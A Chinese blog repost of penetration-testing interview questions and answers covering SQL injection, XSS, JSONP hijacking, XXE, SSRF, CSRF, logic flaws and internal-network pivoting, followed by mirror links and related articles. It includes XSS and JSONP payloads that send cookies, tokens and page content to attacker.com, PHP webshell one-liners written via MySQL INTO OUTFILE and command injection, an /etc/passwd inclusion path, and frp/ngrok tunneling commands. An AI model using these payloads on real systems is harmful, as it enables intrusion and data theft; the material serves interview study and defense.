当前位置: 首页 > news >正文

2025年渗透测试面试题总结-70(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

1. SQL注入

2. XSS攻击

3. JSONP劫持

4. XXE漏洞

5. Getshell姿势速查

6. 漏洞挖掘实战(案例)

7. 电商逻辑漏洞

8. APP密码重置漏洞

9. 经典逻辑漏洞案例

10. SSRF漏洞

11. APP Web漏洞挖掘

12. 通用漏洞利用记录

13. 同源策略与CORS

14. CSRF攻防

15. Web漏洞挖掘流程

16. 内网渗透工具链

17. MySQL导出Webshell

1、SQL注入的成因、代码层防御方式
2、XSS的成因、代码层防御方式、写出3条xsspayload
3、Jsonp劫持漏洞的原理、利用方式、防御方法
4、XXE漏洞的原理、危害、防御方法
5、getshell的姿势(SQL注入、文件包含、文件上传、命令执行、后台getsehll等)
6、在SRC、补天、盒子、乌云等都提交了哪些高中危漏洞,说说挖这些漏洞的方法。
7、说明电商系统的加车、下单、支付过程中,常见的逻辑漏洞有哪些,如何挖掘
8、APP常见任意密码重置漏洞的挖掘方法
9、挖掘过哪些逻辑漏洞,请说明挖洞方法
10、SSRF漏洞的成因、利用方法、防御方式
11、挖掘过哪些APP的web漏洞(非逆向),如何挖掘的
12、利用的过的通用漏洞有哪些?包括CMS、web中间件、操作系统、DB等
13、同源策略,有什么作用?同源策略中Access-Control-Allow-Origin的作用是什么
14、CSRF的成因、利用方式、哪些功能容易有CSRF,防御方法
15、挖掘Web漏洞的流程和思路,是当完成信息收集之后,开始挖洞的思路
16、获取Web shell后,是否做过内网渗透,你用哪些正向代理、反向代理工具,这些工具如何使用
17、写出Mysql导出php一句话木马的命令

1. SQL注入

  • 成因:未过滤用户输入的SQL参数,导致恶意SQL拼接
  • 代码层防御
    • 参数化查询(PreparedStatement
    • 输入过滤(正则过滤'";\-#等字符)
    • 最小权限原则(DB账户禁用DROP/ALTER权限)
    • 框架级防御(如MyBatis的#{}占位符)

2. XSS攻击

  • 成因:未转义用户输入的HTML/JS内容,导致脚本在浏览器执行
  • 防御方案
    • 输出编码(HTML实体化:< → &lt;
    • CSP策略(Content-Security-Policy: default-src 'self'
    • HttpOnly Cookie(阻止JS读取敏感Cookie)
  • XSS Payload示例
    html<script>alert(document.cookie)</script> <!-- 窃取Cookie --> <img src=x onerror="fetch('https://attacker.com?data='+localStorage.token)"> <!-- 窃取本地存储 --> <svg/onload="location.href='https://phish.com?c='+btoa(document.body.innerHTML)"> <!-- 页面劫持 -->

3. JSONP劫持

  • 原理:利用<script>标签跨域特性窃取JSONP回调数据
  • 利用方式
    html<script> function stealData(data){ fetch('https://attacker.com?data='+JSON.stringify(data)) </script> <script src="https://target.com/api?callback=stealData"></script> 
  • 防御:验证Referer头 || 使用CSRF Token || 弃用JSONP改用CORS

4. XXE漏洞

  • 原理:解析恶意XML实体导致文件读取/SSRF
  • 危害
    • 读取file:///etc/passwd
    • 内网端口扫描(<!ENTITY xxe SYSTEM "http://192.168.1.1:8080">
    • 拒绝服务(Billion Laughs攻击)
  • 防御:禁用DTD(XMLParser.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)

5. Getshell姿势速查

漏洞类型利用方式示例
SQL注入SELECT '<?php @eval($_POST[cmd])?>' INTO OUTFILE '/var/www/shell.php'
文件包含?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd
文件上传绕过MIME检测上传.jpg.php 双后缀马
命令执行;echo "<?php system($_GET['c']);?>" > shell.php
后台Getshell利用CMS管理后台的模板编辑功能写入Webshell

6. 漏洞挖掘实战(案例)

  • 提交漏洞类型
    • SRC:支付逻辑漏洞(0元购)
    • 补天:Fastjson反序列化RCE
    • 乌云历史:Struts2 S2-045
  • 方法论
    • 资产测绘(FOFA搜索特定组件)
    • 版本比对(比对CVE影响范围)
    • 流量分析(BurpSuite抓包重放异常参数)

7. 电商逻辑漏洞

  • 加车环节
    • 负数商品导致金额为负(quantity=-100
    • 修改价格参数(price=0.01
  • 下单环节
    • 重复提交订单(并发请求)
    • 优惠券无限复用(未校验状态)
  • 支付环节
    • 支付状态未同步(伪造成功回调)
    • 金额篡改(前端验证绕过)
  • 挖掘技巧
    • 对比前端/后端价格校验差异
    • 遍历订单状态码(如status=success

8. APP密码重置漏洞

  1. 短信验证码爆破(4位验证码未限速)
  2. 邮箱劫持(修改Host头指向自建SMTP)
  3. 身份混淆(修改请求包中的userid=其他用户ID
  4. Token泄漏(重置链接中Token可预测)

9. 经典逻辑漏洞案例

  • 越权删除
    • 删除接口未校验归属权(DELETE /api/order?id=123
  • 条件竞争
    • 余额提现未加锁(高频请求导致超额提现)
  • 步骤绕过
    • 直接访问支付完成页跳过支付流程

10. SSRF漏洞

  • 成因:服务端请求用户可控的URL
  • 利用
    • 内网探测(http://192.168.0.1:8080
    • 云元数据窃取(http://169.254.169.254
    • Gopher协议攻击Redis(写SSH密钥)
  • 防御
    • 禁用非常规协议(file/gopher)
    • 设置URL白名单
    • 启用DNS重绑定防护

11. APP Web漏洞挖掘

  • 漏洞类型:JWT密钥硬编码、接口未授权访问
  • 方法
    • 抓包分析(BurpSuite + 手机代理)
    • 反编译查看网络配置(搜索baseUrl
    • 接口FUZZ(使用Intruder爆破API路径)

12. 通用漏洞利用记录

类型漏洞实例
CMSThinkPHP 5.0.23 RCE
Web中间件Apache Solr Velocity RCE
操作系统Sudo提权漏洞(CVE-2021-3156)
数据库PostgreSQL COPY TO PROGRAM RCE

13. 同源策略与CORS

  • 同源策略:禁止跨域读取资源(协议+域名+端口一致)
  • Access-Control-Allow-Origin
    • *:允许所有域(危险!)
    • https://trusted.com :指定可信源(推荐)
    • 缺失时浏览器拦截跨域响应

14. CSRF攻防

  • 成因:敏感操作未校验请求来源
  • 高危功能:修改密码、转账、邮箱绑定
  • 防御
    • 添加CSRF Token(同步令牌模式)
    • 校验Referer头
    • 关键操作要求二次认证

15. Web漏洞挖掘流程

mermaidgraph TD A[信息收集] --> B(子域名/端口扫描) B --> C[指纹识别] C --> D{漏洞类型决策} D -->|常规漏洞| E[自动化扫描:AWVS/SQLMap] D -->|逻辑漏洞| F[手动测试:BurpSuite重放/修改参数] F --> G[重点路径:登录/支付/权限] G --> H[异常参数测试:越权/竞争/溢出]

16. 内网渗透工具链

  • 正向代理
    • Proxifier:强制指定应用流量走代理
    • 配置:代理服务器 → 内网跳板IP:1080
  • 反向代理
    • frp:将内网服务映射到公网
    • 命令:frpc.exe -t 公网IP -p 7000 -u test -w pass
    • Ngrok:快速HTTP隧道(ngrok http 80

17. MySQL导出Webshell

sqlSELECT '<?php @eval($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '\n';

文章转载自:

http://iT8UqxFg.dzqyn.cn
http://mhsTYdzP.dzqyn.cn
http://gsocWCNv.dzqyn.cn
http://3DWotXKE.dzqyn.cn
http://IEeBgrjj.dzqyn.cn
http://rbxlCT7J.dzqyn.cn
http://OobDryGL.dzqyn.cn
http://kZbQlQqz.dzqyn.cn
http://4xEcxEJ2.dzqyn.cn
http://mtDWnw68.dzqyn.cn
http://9E2Owebf.dzqyn.cn
http://OvUA1bmH.dzqyn.cn
http://JiP3T34H.dzqyn.cn
http://wCHkybri.dzqyn.cn
http://Ct0jL6lU.dzqyn.cn
http://Q7YEp5Wr.dzqyn.cn
http://JoCHFQVz.dzqyn.cn
http://ecaC1TvG.dzqyn.cn
http://FqLpfIz9.dzqyn.cn
http://dgDDxFKz.dzqyn.cn
http://8HgDLiYV.dzqyn.cn
http://KMA89uz9.dzqyn.cn
http://OP4EP5T5.dzqyn.cn
http://AJwW1WZO.dzqyn.cn
http://ArDa80WO.dzqyn.cn
http://MwkNFE11.dzqyn.cn
http://uoV6ztAJ.dzqyn.cn
http://K5n9Nup6.dzqyn.cn
http://6fgpHZxd.dzqyn.cn
http://w7hb1JG9.dzqyn.cn
http://www.dtcms.com/a/382807.html

相关文章:

  • 文献阅读笔记:RS电子战测试与测量技术文档
  • Redis---集群模式
  • 【Zephyr电源与功耗专题】14_BMS电池管理算法(三重验证机制实现高精度电量估算)
  • RK3568 NPU :RKNN-ToolKit2环境搭建
  • Dify插件安装
  • 闪电科创,深度学习辅导
  • Linux-文本三剑客(grep、sed、awk)
  • 桥接模式,打造灵活可扩展的日志系统C++
  • 12-SpringBoot用户列表渲染案例
  • 多语言编码Agent解决方案(3)-VSCode扩展实现
  • 服务器装机遇到的问题
  • 【Linux】进程概念(下)
  • 流行的前端架构与后端架构介绍(Architecture)
  • 【Pywinauto库】12.1 pywinauto.backend 后端内部实施模块
  • Web-birthday
  • 【前端】【高德地图WebJs】【知识体系搭建】面要素知识点——>多边形,圆形, 矩形,图形编辑器
  • 基于脚手架微服务的视频点播系统-数据管理与网络通信部分的预备工作
  • 微服务联调实战:Feign与分布式事务
  • 电脑 hdmi 没有声音问题解决
  • Thingsboard 3.4 源码运行 Mac Mini
  • 【开题答辩全过程】以 “红色枣庄”旅游网站为例,包含答辩的问题和答案
  • 跟着Carl学算法--动态规划【5】
  • 一种基于因果干预的少样本学习的故障诊断模型
  • Go并发编程实战:深入理解Goroutine与Channel
  • 嵌入式硬件设计
  • (附源码)基于Spring Boot社区“邻里帮”平台的设计与实现
  • 贪心算法java
  • AI问答-Nuxt4:什么时候发布的,有哪些特性,和Nuxt3相比 有哪些优势 / Nuxt4 / Nuxt-v4
  • MyBatis 从入门到精通(第三篇)—— 动态 SQL、关联查询与查询缓存
  • 10 C++map/set的底层数据结构红黑树它来了,红黑树入门全解。